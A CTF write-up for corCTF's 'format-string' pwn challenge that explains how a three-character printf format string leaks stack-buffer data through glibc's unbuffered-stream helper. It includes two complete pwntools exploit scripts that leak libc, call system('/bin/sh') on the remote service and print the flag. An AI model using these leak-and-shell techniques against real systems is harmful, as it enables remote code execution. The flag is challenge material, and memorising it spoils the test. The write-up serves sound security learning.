format-string

Introduction

format-string was the easy pwn challenge from this CTF, which I unfortunately only managed to solve 1 hour after the CTF concluded due to my focus on another pwn challenge corchat_v3. While the description claims you'll learn nothing, I would argue that the mechanisms which allow this challenge to be solvable at all are interesting, even if they're quite lucky.

Reversing

Running pwn checksec reveals we have maximum protections (minus FORTIFY).

We're also given the source code and, given the name of the challenge, it's very obvious to spot that the problem here is using C a printf vuln in the aptly-named do_printf.

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>

void do_printf()
{
    char buf[4];

    if (scanf("%3s", buf) <= 0)
        exit(1);

    printf("Here: ");
    printf(buf);
}

void do_call()
{
    void (*ptr)(const char *);

    if (scanf("%p", &ptr) <= 0)
        exit(1);

    ptr("/bin/sh");
}

int main()
{
    int choice;

    setvbuf(stdin, 0, 2, 0);
    setvbuf(stdout, 0, 2, 0);

    while (1)
    {
        puts("1. printf");
        puts("2. call");

        if (scanf("%d", &choice) <= 0)
            break;

        switch (choice)
        {
            case 1:
                do_printf();
                break;
            case 2:
                do_call();
                break;
            default:
                puts("Invalid choice!");
                exit(1);
        }
    }

    return 0;
}

do_printf

It uses scanf("%3s", buf) to read in the format string, meaning we only have a maximum of 3 characters (plus a null byte) to construct a format string. This is barely enough to do anything meaningful, and immediately rules out anything like %n overwrites or %[num]$p leaks.

do_call

We also have do_call, which prompts us for the memory address of a function to call with /bin/sh. The obvious idea here is to use system, and we get our shell, but for that we'd need a libc leak.

So the plan would seem obvious:

  1. Use do_printf to leak libc

  2. Use do_call to get a shell

Leaking libc

So with the size restriction of 3 characters, what do we have available?

  • We only have enough room for 1 format string

  • Any of the regular specifiers of the form: %[specifier] (here's a list of specifiers)

  • We can pad specifiers: %[0-9][specifier]

  • We can use variable width specifiers: %*[specifier]

The description tells us that it's a common specifier, so let's try %p:

%p (and most specifiers that we can use) will access the first argument (besides the format string), so it looks at rsi. In our case, it just so happens that rsi is set to some stack address after the first printf("Here: "), which also interestingly points to the string Here: (I'm sure that won't be significant later).

So we can get a stack leak at the very least, but this doesn't help much. NX is enabled, so we can't jump to the stack, but even if we could, we'd struggle to write any shellcode due to the small buffer size.

Many of the remaining specifiers aren't very useful either, as most of them would be different ways of printing integers, so they'd only print that stack address back to us, but just in different forms. %s doesn't seem that useful at first either, as it would just print Here: back to us.

Floating point?

One idea I had however was floating point specifiers like %f. The reason these are interesting is because they would access different arguments, as in, they wouldn't use rsi. To see this, let's have a closer look at printf:

int
__printf (const char *format, ...)
{
  va_list arg;
  int done;

  va_start (arg, format);
  done = __vfprintf_internal (stdout, format, arg, 0);
  va_end (arg);

  return done;
}

Not much to see here, except for the use of variadic arguments using va_list. You'll probably be familiar with the fact that va_list allows for an unlimited number arguments. It stores the argument registers, plus a pointer to the stack arguments. But it doesn't just store the general purpose (gp) registers (rdi, rsi, rdx, rcx, r8, r9), it can also store the floating point (fp) registers (xmm0-7):

Here we see that the fp registers can be saved to [rsp+0x50] if al != 0, because in a call to a variadic function, al contains the number of fp registers used as arguments, so if any fp registers are used, we should save them.

Since the program doesn't use floating point arguments, it sets al to 0 both times, which means that section of memory is left uninitialised, and if we're lucky, could have a libc address.

And it seems like we may have been lucky? If we can use a floating point specifier which can cover the full 16 bytes, we may be able to leak it as a floating point number, then convert it back. Unfortunately there is no such specifier.

%f is a float (32 bits) and %lf is a double (64 bits), which aren't enough to cover it. While there is %Lf, which is for a long double, on x86 this only covers 80 bits, not 128. Also it seems that these long double arguments are passed using the stack, and so it won't be accessing [rsp+0x50] anyway, it'll instead use the stack arguments (which overlap with the do_printf buffer), which are useless for us:

%s

It turns out that the description wasn't lying when it said it was a widely used specifier (shocker). But doesn't %s just leak the string Here: ?

Well, my teammate ir0nstone found something interesting that happens when you do %p then %s:

The 2nd %s now contains the tail end of the %p output, which is quite interesting. It implies that rsi points to some internal stack buffer that the output gets copied to.

So what if now you do %s followed by some character. In theory, this could append the character to the buffer, as it would output the current buffer + an extra character, which must be copied to this buffer.

And sure enough this works! Now if this is just some stack buffer, there could be uninitialised stack data inside it, which we could pad up to and print back to us. We can verify this with the following script:

from pwn import *

e = context.binary = ELF('chal_patched')

send_choice = lambda c: p.sendlineafter(b"2. call\n", str(c).encode())
def printf(fmt):
	send_choice(1)
	p.sendline(fmt.encode())
	p.recvuntil(b"Here: ")
	return p.recvuntil(b"1. printf", drop=True)

p = e.process()

l = log.progress("")
buf = b"Here: "
for i in range(0x2000):
	l.status(f"{i}/{0x2000}")
	out = printf("%sX")
	if out != buf + b"X"*(i+1):
		break
l.success(f"Found at {i}!")

print(out)

Hang on, what?

This is some weird behaviour, and seems quite lucky for us (which it is). Understandably I had questions.

The buffer

First of all, what is this stack buffer? And also why is there a buffer at all, isn't stdout supposed to be unbuffered?

To answer these, let's look further into printf. We saw that it calls vfprintf, so lets start there.

It starts off by doing some sanity checks, but then checks if the file is unbuffered, and if it is, it will call buffered_vfprintf:

It seems that when the file is unbuffered, it creates a "helper file" on the stack that uses a stack buffer, and then it prints to the "helper file". This seems like such a hack (cos it is), but thankfully it helps us out, because CHAR_T buf[BUFSIZ] is where the output goes before it's written out.

Why in rsi?

After it gets printed to the "helper file", the output sits in the stack buffer, and now needs to be written out to stdout. It does this by calling _IO_sputn, which goes on to call the write syscall in _IO_new_file_write.

This is where rsi would be set to the buffer, and from this point the rsi register remains untouched. The main reason for this is the fact that no function calls (with 2+ arguments) take place after this, so it never gets clobbered.

However there is still an element of "luck", because rdi is clobbered by _IO_funlockfile (see here), and rdx gets clobbered as a scratch register.

ld leak to libc leak

In my solution I used the first address I found (the one found by the script) for my leak. Unfortunately this address was an ld address (_dl_process_pt_note+539), not libc. However, due to how the libraries are mapped, for each system the offsets between the libraries are deterministic, so we can convert this into a libc leak.

The offset for my system was 0x1f4000, but remotely I had to fiddle a bit to find that it was 0x1f6000 (not the cleanest way to do it, but oh well).

Solution

Armed with a libc leak, we can now call do_call and get RCE.

#!/usr/bin/python3
from pwn import *

e = context.binary = ELF('chal_patched')
libc = ELF('libc-2.31.so', checksec=False)
ld = ELF('ld-2.31.so', checksec=False)
if args.REMOTE:
	ip, port = "be.ax", 32323
	conn = lambda: remote(ip, port)
	LIBC_TO_LD = 0x1f4000 + 0x1000*(2)
else:
	conn = lambda: e.process()
	LIBC_TO_LD = 0x1f4000

send_choice = lambda c: p.sendlineafter(b"2. call\n", str(c).encode())

def printf(fmt):
	send_choice(1)
	p.sendline(fmt.encode())
	p.recvuntil(b"Here: ")
	return p.recvuntil(b"1. printf", drop=True)

def call(func):
	send_choice(2)
	p.sendline(hex(func).encode())

p = conn()

leak_off = 0x1248
delim = b"Here: ".ljust(leak_off, b"X")

# send all this in one go to speed up remote
p.send(b"1\n%sX\n" * (leak_off - len("Here: ")))
p.recvuntil(delim)

ld_leak = u64(printf("%sX")[leak_off:leak_off+6] + b"\x00\x00")
log.info(f"ld_leak: {hex(ld_leak)}")

ld.address = ld_leak - (ld.sym._dl_process_pt_note+539)
log.info(f"ld: {hex(ld.address)}")

libc.address = ld.address - LIBC_TO_LD
log.info(f"libc: {hex(libc.address)}")

call(libc.sym.system)
p.interactive()
# corctf{w4CKy_$tr1NG-f0rm4T!}

Alternative Solution

The above is my solution, but there was another approach that was shared on the discord after the event finished, which involved the variable width specifier: %*x.

The variable width specifier allows the user to specify the width for an argument as an argument:

#include <stdio.h>

int main() {
    printf("|%*d|\n", 10, 69);
    printf("|%*d|\n", -10, 69);
}

/*
OUTPUT:
|        69|
|69        |
*/

This can be useful in some printf exploits using %n, as you can use the lower 32 bits of an address as a width, and print a variable number of bytes depending on that address (here's an example).

In our case however, it would use rsi as a width and, since thats an address, it will print a lot of bytes (most of which are spaces). This is useful because this amount of printing will fill up the buffer, and then when another function is called (like scanf), it will clobber the stack buffer with its stack usage, leaving behind addresses. Now the buffer has spaces padding up to some address, which in our case happens to be _IO_2_1_stdin_, which we can print.

Below is my implementation of this solution (I opted to find a process with a low width, so that the exploit would run quicker remotely).

#!/usr/bin/python3
from pwn import *

e = context.binary = ELF('chal_patched')
libc = ELF('libc-2.31.so', checksec=False)
ld = ELF('ld-2.31.so', checksec=False)
if args.REMOTE:
	ip, port = "be.ax", 32323
	conn = lambda: remote(ip, port, level="error")
	MAX_WIDTH = 1*(1<<28)
else:
	conn = lambda: e.process(level="error")
	MAX_WIDTH = 2*(1<<28)

send_choice = lambda c: p.sendlineafter(b"2. call\n", str(c).encode())

def printf(fmt):
	send_choice(1)
	p.sendline(fmt.encode())
	p.recvuntil(b"Here: ")
	return p.recvuntil(b"1. printf", drop=True)

def call(func):
	send_choice(2)
	p.sendline(hex(func).encode())

# find a process with a low width
while True:
	p = conn()

	width = abs(int(printf("%d")))
	log.info(f"width: {hex(width)}")
	if width <= MAX_WIDTH:
		break
	p.close()

l = log.progress("filling buffer")
# fill buffer
printf("%*x")
l.success("done")

libc_leak = u64(printf("%s")[-6:] + b"\x00\x00")
log.info(f"libc leak: {hex(libc_leak)}")

libc.address = libc_leak - libc.sym._IO_2_1_stdin_
log.info(f"libc: {hex(libc.address)}")

call(libc.sym.system)
p.interactive()
# corctf{w4CKy_$tr1NG-f0rm4T!}

Last updated